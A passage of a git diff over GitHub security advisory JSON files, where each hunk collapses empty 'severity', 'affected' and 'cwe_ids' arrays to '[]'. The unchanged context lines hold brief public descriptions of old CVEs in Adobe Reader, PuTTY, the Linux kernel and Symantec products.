CVE-2015-5100, CVE-2015-5103, CVE-2015-5104, and CVE-2015-5115.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gghw-r9p3-xchr/GHSA-gghw-r9p3-xchr.json b/advisories/unreviewed/2022/05/GHSA-gghw-r9p3-xchr/GHSA-gghw-r9p3-xchr.json index d6f97b13b98..d38025ac20e 100644 --- a/advisories/unreviewed/2022/05/GHSA-gghw-r9p3-xchr/GHSA-gghw-r9p3-xchr.json +++ b/advisories/unreviewed/2022/05/GHSA-gghw-r9p3-xchr/GHSA-gghw-r9p3-xchr.json @@ -7,12 +7,8 @@ "CVE-2015-6698" ], "details": "Heap-based buffer overflow in the AcroForm implementation in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-6696.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gh3v-qf25-6582/GHSA-gh3v-qf25-6582.json b/advisories/unreviewed/2022/05/GHSA-gh3v-qf25-6582/GHSA-gh3v-qf25-6582.json index 502f39c8e5c..82765b4d17e 100644 --- a/advisories/unreviewed/2022/05/GHSA-gh3v-qf25-6582/GHSA-gh3v-qf25-6582.json +++ b/advisories/unreviewed/2022/05/GHSA-gh3v-qf25-6582/GHSA-gh3v-qf25-6582.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gmgf-pqhp-6w55/GHSA-gmgf-pqhp-6w55.json b/advisories/unreviewed/2022/05/GHSA-gmgf-pqhp-6w55/GHSA-gmgf-pqhp-6w55.json index 28b44cca565..b628da9ef08 100644 --- a/advisories/unreviewed/2022/05/GHSA-gmgf-pqhp-6w55/GHSA-gmgf-pqhp-6w55.json +++ b/advisories/unreviewed/2022/05/GHSA-gmgf-pqhp-6w55/GHSA-gmgf-pqhp-6w55.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gpv2-xxvx-f68g/GHSA-gpv2-xxvx-f68g.json b/advisories/unreviewed/2022/05/GHSA-gpv2-xxvx-f68g/GHSA-gpv2-xxvx-f68g.json index 12daee09d7b..50902d0b3b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-gpv2-xxvx-f68g/GHSA-gpv2-xxvx-f68g.json +++ b/advisories/unreviewed/2022/05/GHSA-gpv2-xxvx-f68g/GHSA-gpv2-xxvx-f68g.json @@ -7,12 +7,8 @@ "CVE-2014-3977" ], "details": "libodm.a in IBM AIX 6.1 and 7.1, and VIOS 2.2.x, allows local users to overwrite arbitrary files via a symlink attack on a temporary file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-2179.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gq5r-249p-4958/GHSA-gq5r-249p-4958.json b/advisories/unreviewed/2022/05/GHSA-gq5r-249p-4958/GHSA-gq5r-249p-4958.json index 3af27c3cdc6..f532b10cb04 100644 --- a/advisories/unreviewed/2022/05/GHSA-gq5r-249p-4958/GHSA-gq5r-249p-4958.json +++ b/advisories/unreviewed/2022/05/GHSA-gq5r-249p-4958/GHSA-gq5r-249p-4958.json @@ -7,12 +7,8 @@ "CVE-2015-6684" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gqc5-w5w8-8fg7/GHSA-gqc5-w5w8-8fg7.json b/advisories/unreviewed/2022/05/GHSA-gqc5-w5w8-8fg7/GHSA-gqc5-w5w8-8fg7.json index a9156083ed1..a6a984f0038 100644 --- a/advisories/unreviewed/2022/05/GHSA-gqc5-w5w8-8fg7/GHSA-gqc5-w5w8-8fg7.json +++ b/advisories/unreviewed/2022/05/GHSA-gqc5-w5w8-8fg7/GHSA-gqc5-w5w8-8fg7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gqcg-rpgj-92fp/GHSA-gqcg-rpgj-92fp.json b/advisories/unreviewed/2022/05/GHSA-gqcg-rpgj-92fp/GHSA-gqcg-rpgj-92fp.json index ef507da46a3..2987efca3fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-gqcg-rpgj-92fp/GHSA-gqcg-rpgj-92fp.json +++ b/advisories/unreviewed/2022/05/GHSA-gqcg-rpgj-92fp/GHSA-gqcg-rpgj-92fp.json @@ -7,12 +7,8 @@ "CVE-2013-4207" ], "details": "Buffer overflow in sshbn.c in PuTTY before 0.63 allows remote SSH servers to cause a denial of service (crash) via an invalid DSA signature that is not properly handled during computation of a modular inverse and triggers the overflow during a division by zero by the bignum functionality, a different vulnerability than CVE-2013-4206.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gv5w-cxj4-6jq9/GHSA-gv5w-cxj4-6jq9.json b/advisories/unreviewed/2022/05/GHSA-gv5w-cxj4-6jq9/GHSA-gv5w-cxj4-6jq9.json index c05f4f0e7f0..bf9517db0cf 100644 --- a/advisories/unreviewed/2022/05/GHSA-gv5w-cxj4-6jq9/GHSA-gv5w-cxj4-6jq9.json +++ b/advisories/unreviewed/2022/05/GHSA-gv5w-cxj4-6jq9/GHSA-gv5w-cxj4-6jq9.json @@ -7,12 +7,8 @@ "CVE-2015-7614" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions and execute arbitrary commands via an app.launchURL call, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gx32-cqxf-6wm7/GHSA-gx32-cqxf-6wm7.json b/advisories/unreviewed/2022/05/GHSA-gx32-cqxf-6wm7/GHSA-gx32-cqxf-6wm7.json index 501ad2efc33..d7bb97f7046 100644 --- a/advisories/unreviewed/2022/05/GHSA-gx32-cqxf-6wm7/GHSA-gx32-cqxf-6wm7.json +++ b/advisories/unreviewed/2022/05/GHSA-gx32-cqxf-6wm7/GHSA-gx32-cqxf-6wm7.json @@ -7,12 +7,8 @@ "CVE-2014-9226" ], "details": "The management server in Symantec Critical System Protection (SCSP) 5.2.9 through MP6 and Symantec Data Center Security: Server Advanced (SDCS:SA) 6.0.x through 6.0 MP1 allows local users to bypass intended Protection Policies via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gxgp-2885-hjmh/GHSA-gxgp-2885-hjmh.json b/advisories/unreviewed/2022/05/GHSA-gxgp-2885-hjmh/GHSA-gxgp-2885-hjmh.json index 4268d53f547..a346da467e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-gxgp-2885-hjmh/GHSA-gxgp-2885-hjmh.json +++ b/advisories/unreviewed/2022/05/GHSA-gxgp-2885-hjmh/GHSA-gxgp-2885-hjmh.json @@ -7,12 +7,8 @@ "CVE-2015-5583" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass intended sandbox restrictions and obtain sensitive PDF information by launching a print job on a remote printer, a different vulnerability than CVE-2015-6705, CVE-2015-6706, and CVE-2015-7624.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gxr7-xgq6-2pjx/GHSA-gxr7-xgq6-2pjx.json b/advisories/unreviewed/2022/05/GHSA-gxr7-xgq6-2pjx/GHSA-gxr7-xgq6-2pjx.json index 1fe4b31f13e..8a12d554f2d 100644 --- a/advisories/unreviewed/2022/05/GHSA-gxr7-xgq6-2pjx/GHSA-gxr7-xgq6-2pjx.json +++ b/advisories/unreviewed/2022/05/GHSA-gxr7-xgq6-2pjx/GHSA-gxr7-xgq6-2pjx.json @@ -7,12 +7,8 @@ "CVE-2011-0776" ], "details": "The sandbox implementation in Google Chrome before 9.0.597.84 on Mac OS X might allow remote attackers to obtain potentially sensitive information about local files via vectors related to the stat system call.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h2xq-wm46-j26f/GHSA-h2xq-wm46-j26f.json b/advisories/unreviewed/2022/05/GHSA-h2xq-wm46-j26f/GHSA-h2xq-wm46-j26f.json index e5e24de03e5..e2cafb9a0bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-h2xq-wm46-j26f/GHSA-h2xq-wm46-j26f.json +++ b/advisories/unreviewed/2022/05/GHSA-h2xq-wm46-j26f/GHSA-h2xq-wm46-j26f.json @@ -7,12 +7,8 @@ "CVE-2015-2922" ], "details": "The ndisc_router_discovery function in net/ipv6/ndisc.c in the Neighbor Discovery (ND) protocol implementation in the IPv6 stack in the Linux kernel before 3.19.6 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -96,9 +92,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h3qh-4wmf-6pvg/GHSA-h3qh-4wmf-6pvg.json b/advisories/unreviewed/2022/05/GHSA-h3qh-4wmf-6pvg/GHSA-h3qh-4wmf-6pvg.json index e58b0bd54b8..61390e0f426 100644 --- a/advisories/unreviewed/2022/05/GHSA-h3qh-4wmf-6pvg/GHSA-h3qh-4wmf-6pvg.json +++ b/advisories/unreviewed/2022/05/GHSA-h3qh-4wmf-6pvg/GHSA-h3qh-4wmf-6pvg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h3qw-gcpw-f6mg/GHSA-h3qw-gcpw-f6mg.json b/advisories/unreviewed/2022/05/GHSA-h3qw-gcpw-f6mg/GHSA-h3qw-gcpw-f6mg.json index 9fd99711aa2..93d6d4fc70e 100644 --- a/advisories/unreviewed/2022/05/GHSA-h3qw-gcpw-f6mg/GHSA-h3qw-gcpw-f6mg.json +++ b/advisories/unreviewed/2022/05/GHSA-h3qw-gcpw-f6mg/GHSA-h3qw-gcpw-f6mg.json @@ -7,12 +7,8 @@ "CVE-2013-4206" ], "details": "Heap-based buffer underflow in the modmul function in sshbn.c in PuTTY before 0.63 allows remote SSH servers to cause a denial of service (crash) and possibly trigger memory corruption or code execution via a crafted DSA signature, which is not properly handled when performing certain bit-shifting operations during modular multiplication.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h4hc-5cmg-rhc2/GHSA-h4hc-5cmg-rhc2.json b/advisories/unreviewed/2022/05/GHSA-h4hc-5cmg-rhc2/GHSA-h4hc-5cmg-rhc2.json index 4ef628d45ec..6fc5d77581b 100644 --- a/advisories/unreviewed/2022/05/GHSA-h4hc-5cmg-rhc2/GHSA-h4hc-5cmg-rhc2.json +++ b/advisories/unreviewed/2022/05/GHSA-h4hc-5cmg-rhc2/GHSA-h4hc-5cmg-rhc2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h4qp-ph3r-9hj4/GHSA-h4qp-ph3r-9hj4.json b/advisories/unreviewed/2022/05/GHSA-h4qp-ph3r-9hj4/GHSA-h4qp-ph3r-9hj4.json index 0e237338ac4..0d2be460c3d 100644 --- a/advisories/unreviewed/2022/05/GHSA-h4qp-ph3r-9hj4/GHSA-h4qp-ph3r-9hj4.json +++ b/advisories/unreviewed/2022/05/GHSA-h4qp-ph3r-9hj4/GHSA-h4qp-ph3r-9hj4.json @@ -7,12 +7,8 @@ "CVE-2014-3440" ], "details": "The Agent Control Interface in the management server in Symantec Critical System Protection (SCSP) 5.2.9 before MP6 and Symantec Data Center Security: Server Advanced (SDCS:SA) 6.0.x before 6.0 MP1 allows remote authenticated users to execute arbitrary commands by leveraging client-system access to upload a log file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h624-753q-7f46/GHSA-h624-753q-7f46.json b/advisories/unreviewed/2022/05/GHSA-h624-753q-7f46/GHSA-h624-753q-7f46.json index 9da25d9b160..90f206c6ff6 100644 --- a/advisories/unreviewed/2022/05/GHSA-h624-753q-7f46/GHSA-h624-753q-7f46.json +++ b/advisories/unreviewed/2022/05/GHSA-h624-753q-7f46/GHSA-h624-753q-7f46.json @@ -7,12 +7,8 @@ "CVE-2010-3329" ], "details": "mshtmled.dll in Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code via a crafted Microsoft Office document that causes the HtmlDlgHelper class destructor to access uninitialized memory, aka \"Uninitialized Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h75c-8hcv-36gq/GHSA-h75c-8hcv-36gq.json b/advisories/unreviewed/2022/05/GHSA-h75c-8hcv-36gq/GHSA-h75c-8hcv-36gq.json index 5d0bc9a1202..34ed092d9d1 100644 --- a/advisories/unreviewed/2022/05/GHSA-h75c-8hcv-36gq/GHSA-h75c-8hcv-36gq.json +++ b/advisories/unreviewed/2022/05/GHSA-h75c-8hcv-36gq/GHSA-h75c-8hcv-36gq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h75x-7453-rhhx/GHSA-h75x-7453-rhhx.json b/advisories/unreviewed/2022/05/GHSA-h75x-7453-rhhx/GHSA-h75x-7453-rhhx.json index e546e14a05e..10f248b5f9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-h75x-7453-rhhx/GHSA-h75x-7453-rhhx.json +++ b/advisories/unreviewed/2022/05/GHSA-h75x-7453-rhhx/GHSA-h75x-7453-rhhx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h94q-m4mx-m5hq/GHSA-h94q-m4mx-m5hq.json b/advisories/unreviewed/2022/05/GHSA-h94q-m4mx-m5hq/GHSA-h94q-m4mx-m5hq.json index 08f29235555..ef167407061 100644 --- a/advisories/unreviewed/2022/05/GHSA-h94q-m4mx-m5hq/GHSA-h94q-m4mx-m5hq.json +++ b/advisories/unreviewed/2022/05/GHSA-h94q-m4mx-m5hq/GHSA-h94q-m4mx-m5hq.json @@ -7,12 +7,8 @@ "CVE-2015-6710" ], "details": "The CBBBRInit method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h969-5rx9-j9gx/GHSA-h969-5rx9-j9gx.json b/advisories/unreviewed/2022/05/GHSA-h969-5rx9-j9gx/GHSA-h969-5rx9-j9gx.json index a314b086f21..c0c68740c48 100644 --- a/advisories/unreviewed/2022/05/GHSA-h969-5rx9-j9gx/GHSA-h969-5rx9-j9gx.json +++ b/advisories/unreviewed/2022/05/GHSA-h969-5rx9-j9gx/GHSA-h969-5rx9-j9gx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hfr7-98xv-72wr/GHSA-hfr7-98xv-72wr.json b/advisories/unreviewed/2022/05/GHSA-hfr7-98xv-72wr/GHSA-hfr7-98xv-72wr.json index ea5b30aea44..81a20123be2 100644 --- a/advisories/unreviewed/2022/05/GHSA-hfr7-98xv-72wr/GHSA-hfr7-98xv-72wr.json +++ b/advisories/unreviewed/2022/05/GHSA-hfr7-98xv-72wr/GHSA-hfr7-98xv-72wr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hfxx-8v8g-6rcx/GHSA-hfxx-8v8g-6rcx.json b/advisories/unreviewed/2022/05/GHSA-hfxx-8v8g-6rcx/GHSA-hfxx-8v8g-6rcx.json index 075b677dbaf..07fa7ab3e0a 100644 --- a/advisories/unreviewed/2022/05/GHSA-hfxx-8v8g-6rcx/GHSA-hfxx-8v8g-6rcx.json +++ b/advisories/unreviewed/2022/05/GHSA-hfxx-8v8g-6rcx/GHSA-hfxx-8v8g-6rcx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hgh3-48mm-f4ww/GHSA-hgh3-48mm-f4ww.json b/advisories/unreviewed/2022/05/GHSA-hgh3-48mm-f4ww/GHSA-hgh3-48mm-f4ww.json index 791f7b1ad77..869410231b4 100644 --- a/advisories/unreviewed/2022/05/GHSA-hgh3-48mm-f4ww/GHSA-hgh3-48mm-f4ww.json +++ b/advisories/unreviewed/2022/05/GHSA-hgh3-48mm-f4ww/GHSA-hgh3-48mm-f4ww.json @@ -7,12 +7,8 @@ "CVE-2015-7619" ], "details": "The ANShareFile2 method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hj57-2j35-gv4c/GHSA-hj57-2j35-gv4c.json b/advisories/unreviewed/2022/05/GHSA-hj57-2j35-gv4c/GHSA-hj57-2j35-gv4c.json index c08766d6aa1..53d1a615bb0 100644 --- a/advisories/unreviewed/2022/05/GHSA-hj57-2j35-gv4c/GHSA-hj57-2j35-gv4c.json +++ b/advisories/unreviewed/2022/05/GHSA-hj57-2j35-gv4c/GHSA-hj57-2j35-gv4c.json @@ -7,12 +7,8 @@ "CVE-2015-6716" ], "details": "The ANSendForFormDistribution method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hjxj-46q6-99mq/GHSA-hjxj-46q6-99mq.json b/advisories/unreviewed/2022/05/GHSA-hjxj-46q6-99mq/GHSA-hjxj-46q6-99mq.json index 5567539d74b..00850a49a3c 100644 --- a/advisories/unreviewed/2022/05/GHSA-hjxj-46q6-99mq/GHSA-hjxj-46q6-99mq.json +++ b/advisories/unreviewed/2022/05/GHSA-hjxj-46q6-99mq/GHSA-hjxj-46q6-99mq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hm5j-3vjq-qp24/GHSA-hm5j-3vjq-qp24.json b/advisories/unreviewed/2022/05/GHSA-hm5j-3vjq-qp24/GHSA-hm5j-3vjq-qp24.json index a425319cea8..44e820362af 100644 --- a/advisories/unreviewed/2022/05/GHSA-hm5j-3vjq-qp24/GHSA-hm5j-3vjq-qp24.json +++ b/advisories/unreviewed/2022/05/GHSA-hm5j-3vjq-qp24/GHSA-hm5j-3vjq-qp24.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hmv6-r738-7mmg/GHSA-hmv6-r738-7mmg.json b/advisories/unreviewed/2022/05/GHSA-hmv6-r738-7mmg/GHSA-hmv6-r738-7mmg.json index c69d9933243..7231a417998 100644 --- a/advisories/unreviewed/2022/05/GHSA-hmv6-r738-7mmg/GHSA-hmv6-r738-7mmg.json +++ b/advisories/unreviewed/2022/05/GHSA-hmv6-r738-7mmg/GHSA-hmv6-r738-7mmg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hp8q-jv2q-wp3j/GHSA-hp8q-jv2q-wp3j.json b/advisories/unreviewed/2022/05/GHSA-hp8q-jv2q-wp3j/GHSA-hp8q-jv2q-wp3j.json index 5565ad04e0c..dea712a94a3 100644 --- a/advisories/unreviewed/2022/05/GHSA-hp8q-jv2q-wp3j/GHSA-hp8q-jv2q-wp3j.json +++ b/advisories/unreviewed/2022/05/GHSA-hp8q-jv2q-wp3j/GHSA-hp8q-jv2q-wp3j.json @@ -7,12 +7,8 @@ "CVE-2015-6694" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted use of the fillColor attribute, a different vulnerability than CVE-2015-6685, CVE-2015-6686, CVE-2015-6693, CVE-2015-6695, and CVE-2015-7622.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hvrm-924x-c9hr/GHSA-hvrm-924x-c9hr.json b/advisories/unreviewed/2022/05/GHSA-hvrm-924x-c9hr/GHSA-hvrm-924x-c9hr.json index 0a1d50bdc06..4960973bb13 100644 --- a/advisories/unreviewed/2022/05/GHSA-hvrm-924x-c9hr/GHSA-hvrm-924x-c9hr.json +++ b/advisories/unreviewed/2022/05/GHSA-hvrm-924x-c9hr/GHSA-hvrm-924x-c9hr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hvvq-g6h8-66f2/GHSA-hvvq-g6h8-66f2.json b/advisories/unreviewed/2022/05/GHSA-hvvq-g6h8-66f2/GHSA-hvvq-g6h8-66f2.json index e55d4e7ae08..6561c2119ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-hvvq-g6h8-66f2/GHSA-hvvq-g6h8-66f2.json +++ b/advisories/unreviewed/2022/05/GHSA-hvvq-g6h8-66f2/GHSA-hvvq-g6h8-66f2.json @@ -7,12 +7,8 @@ "CVE-2015-6717" ], "details": "The DynamicAnnotStore method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": 